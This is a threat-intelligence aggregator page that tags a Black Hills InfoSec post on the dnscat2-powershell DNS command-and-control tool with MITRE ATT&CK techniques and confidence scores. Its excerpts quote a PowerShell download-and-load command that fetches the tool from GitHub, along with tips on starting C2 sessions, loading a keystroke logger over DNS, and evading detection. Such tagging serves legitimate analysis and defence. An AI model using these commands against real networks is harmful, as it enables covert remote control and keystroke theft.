TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Black Hills InfoSec

PowerShell DNS Command & Control with dnscat2-powershell

BHIS · 2017-01-11 · Read original ↗

ATT&CK techniques detected

9 predictions
T1059.001PowerShell
99%
“powershell session by typing the following command : exec psh you may also pass the - execps switch to start - dnscat2 to enable this feature. the client will take input from the server, pass it to invoke - expression, and return the output. variables are preserved throughout the…”
T1071.004DNS
99%
“powershell dns command & control with dnscat2 - powershell powershell dns command & control with dnscat2 - powershell luke baggett / / imagine a scenario where a penetration tester is trying to set up command and control on an internal network blocking all outbound traffic, excep…”
T1572Protocol Tunneling
98%
“shown, as well as how you can load other powershell scripts via dns. the example script is get - keystrokes, part of powersploit. encryption by default, all traffic is encrypted. this can be turned off by passing - noencryption to start - dnscat2, and starting the server with fol…”
T1572Protocol Tunneling
98%
“is when the dnscat2 client is on an internal network with an ssh server. by setting up a tunnel from a port on the server to the ssh server on the internal network, you can achieve an interactive ssh session over dns. the below video shows how this is done : avoiding detection by…”
T1059.001PowerShell
96%
“webclient ). downloadstring ( ' https : / / raw. githubusercontent. com / lukebaggett / dnscat2 - powershell / master / dnscat2. ps1 ' ) once the functions are loaded, run the following command to start the dnscat2 - powershell server : start - dnscat2 - domain test - dnsserver 1…”
T1572Protocol Tunneling
95%
“a signature could be written based on queries using the precise maximum length of a query. if you want to be slightly more stealthy, you can shorten your maximum request size with the - maxpacketsize parameter. many dns tunnels will use txt, cname, or mx queries due to the simpli…”
T1071.004DNS
84%
“the best dns tunnel tools around for infosec - related applications. dnscat2 supports encryption, authentication via pre - shared secrets, multiple simultaneous sessions, tunnels similar to those in ssh, command shells, and the most popular dns query types ( txt, mx, cname, a, aa…”
T1071.004DNS
84%
“some real practical advantages. primarily, providing a shell in environments with even the most extreme outbound traffic filtering. the major downside is the slow speeds involved with forwarding all your traffic through the internet ’ s dns servers. now with a powershell version …”
T1059.001PowerShell
48%
“local connections, but you can read about how to set up an authoritative server here. setup ron bowes gives a great tutorial on how to install the server in his readme for dnscat2. once the server is ready, you can start it like this : sudo ruby dnscat2. rb - - dns “ domain = tes…”

Summary

Luke Baggett // Imagine a scenario where a Penetration Tester is trying to set up command and control on an internal network blocking all outbound traffic, except traffic towards a […]

The post PowerShell DNS Command & Control with dnscat2-powershell appeared first on Black Hills Information Security, Inc..